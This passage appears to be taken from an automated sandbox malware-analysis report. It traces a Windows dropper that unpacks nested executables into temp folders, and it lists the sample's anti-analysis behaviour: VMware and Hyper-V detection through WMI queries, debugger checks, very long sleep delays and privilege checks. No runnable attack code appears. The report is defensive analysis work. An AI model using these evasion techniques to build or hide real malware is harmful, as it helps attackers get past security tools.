                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0040E21D push ecx; ret 6_2_0040E230
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0041C6BE push ebx; ret 6_2_0041C6BF
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_02F4C486 push edi; retf 6_2_02F4C487
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_02F4953B push FFFFFFE1h; ret 6_2_02F4954A
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E7202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00E7202A
                    Source: iGb20db.exe.3.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                    Source: nNy98cB79.exe.1.drStatic PE information: section name: .tizivod
                    Source: nNy98cB79.exe.1.drStatic PE information: section name: .rotuv
                    Source: nNy98cB79.exe.1.drStatic PE information: section name: .vuj
                    Source: nNy98cB79.exe.1.drStatic PE information: section name: .vuwoy
                    Source: mzc23WZ.exe.2.drStatic PE information: section name: .zar
                    Source: mzc23WZ.exe.2.drStatic PE information: section name: .dat
                    Source: mzc23WZ.exe.2.drStatic PE information: section name: .zire
                    Source: mzc23WZ.exe.2.drStatic PE information: section name: .zimikuy
                    Source: kLL28QE.exe.3.drStatic PE information: section name: .tizivod
                    Source: kLL28QE.exe.3.drStatic PE information: section name: .rotuv
                    Source: kLL28QE.exe.3.drStatic PE information: section name: .vuj
                    Source: kLL28QE.exe.3.drStatic PE information: section name: .vuwoy
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeFile created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mzc23WZ.exeJump to dropped file
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeFile created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeJump to dropped file
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E71AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00E71AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_003E1AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_000E1AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A61AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,3_2_00A61AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe TID: 4888Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe TID: 5576Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe TID: 4724Thread sleep count: 1863 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe TID: 632Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWindow / User API: threadDelayed 1863Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-2575
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2454
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2449
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mzc23WZ.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: kLL28QE.exe, 00000006.00000002.414920676.00000000080FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: kLL28QE.exe, 00000006.00000002.414920676.00000000080FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareHMSHRMWOWin32_VideoControllerPR9YUGSBVideoController120060621000000.000000-000.18.6438display.infMSBDAWPVM7RCHPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsBDFLK2YO8
                    Source: kLL28QE.exe, 00000006.00000002.414920676.00000000080FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareHMSHRMWOWin32_VideoControllerPR9YUGSBVideoController120060621000000.000000-000.18.6438display.infMSBDAWPVM7RCHPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsBDFLK2YOPro|C:\Wind
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000005061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: iLYFm2VCi5YJLdripStah81GHYJ9KYOWYGTzUQSW5Xr0BMhM0g01h7GMlrE2gPxaWoDL7Nj5bvvvHUUnBNmNp1zvZHWmxn70H+/+fBv7SBRdjpHIyxO+cth8r52jHOuu4k52FVCulbTLGBOQdePmn4yWU4DHapUZIIDCE8haBuaP6ME1bUVd9ksPLwr6pYfXJ8elhx923AebXopcXGpLkZt521LkiRV3Y1HvC1N99mnyc//+3IXs1+e1eylrd6Ndu7a5muj3Qz76XY1YK57GiorA802X9XenHsNF5xg64LEOHPN0K3b016FAx/CMOtT3awYtx0gnRWFakE/Uy9iHnluqt7hTJZezzgbyu828hKT79DdAiLkQEmZWB63rToy4E4N0W6/LlbXPSnf8740LIXeuR7c30C7b5S4I+G45ah79uhgFsdEuCNsAJqJowQLCRcldJB13WEDU0e1noJVWocpD+H/ShMxXwbvcghYeFib40kxHmVuNLsNfZHj8sfiwVOIrR4Qq3tUXF0DUWFq7ZnF6NhD10Y7390fR4uHJGUXEWKeEoi3SY60tj8lSlgaEtz5pzpbZ5o433vCvi9j8LOmxNnraoda54Q1ehz7vkdc/GmGfD69qsM83jjenB7FZjJ4R+WO1U2KtjLfnGZL82rWHBsfdD8XuU/tB6T61LxG7Tx1EJe5PhVwBagEkXJIueG0LyR675e1/uTvK/hCifCr8DKl8OlCvazdzvref2p/cCLbbTz8g7fbTl4Tt9jOIRtyXBnHftURZtjQ32hM0dgpt0jElPOz2NVRVqh0Rao2DglCG7cSQKsDxST9arYEV9vM1Xp7B6/dUYZ+g8vr9oj8yhCVZsWrQ7p+++PLL8NCFSagkQmDXcalRmqzzZdzOFVRA5UGBh9dbcFLDuoFHNrDkdjS2JJPTMqImepOp7ijuHdO9YMcC9jdwV4qxtOwFo3xVL+Q0KChnVKmeW+AII2G3HjULkmO8sljCcrQIwAYL+uQII0EhsWzLCh1EEApdCyII15ItiCA09Xg46iShPXmLlkykenMpelF+9xdJBd3fzcv9PMi92yF3mw+gS74li2dmJXlmVpIvXsqSd1p81CX37zBkn6QjHpfMBaOfLr/BrUIdipa/U0vZVqgqLJMorvRCzqfNjQJeO12fMf8rY15oGbMaC6yWnnhxDzzSSTOrRtJZpwIO1r8RIZs+B6JlWkm0RjcteHeqJyolWavxBt27j9eiGIUiNVQ7VmsC22QZKW6P9QKxbf0fWwF7zJvfmhfwXATc7RCw1wT5kyYizviLmOn80GceZHxEMxwoZ6bzwxi1NWFT2cWZzg+SlptJnH+sTdo9Mf5DFCX0qVWcEvBP44JamhRrEwNadbpjkObMSi91fKYuKFgNB9x+Ntc6ofyzUD8tjpaQcae5WOtNyuaLc02ULbcZb7lNkjmBlHrIcJnebCq2OEtq
                    Source: kLL28QE.exe, 00000006.00000002.414920676.00000000080FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E75467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00E75467
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E72390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00E72390
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_003E2390
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_000E2390
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A62390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_00A62390
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E7202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00E7202A
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_02F47A23 push dword ptr fs:[00000030h]6_2_02F47A23
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0040ADB0 GetProcessHeap,HeapFree,6_2_0040ADB0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E76F40 SetUnhandledExceptionFilter,0_2_00E76F40
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E76CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00E76CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E6F40 SetUnhandledExceptionFilter,1_2_003E6F40
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_003E6CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E6F40 SetUnhandledExceptionFilter,2_2_000E6F40
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_000E6CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A66F40 SetUnhandledExceptionFilter,3_2_00A66F40
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A66CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00A66CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040E61C
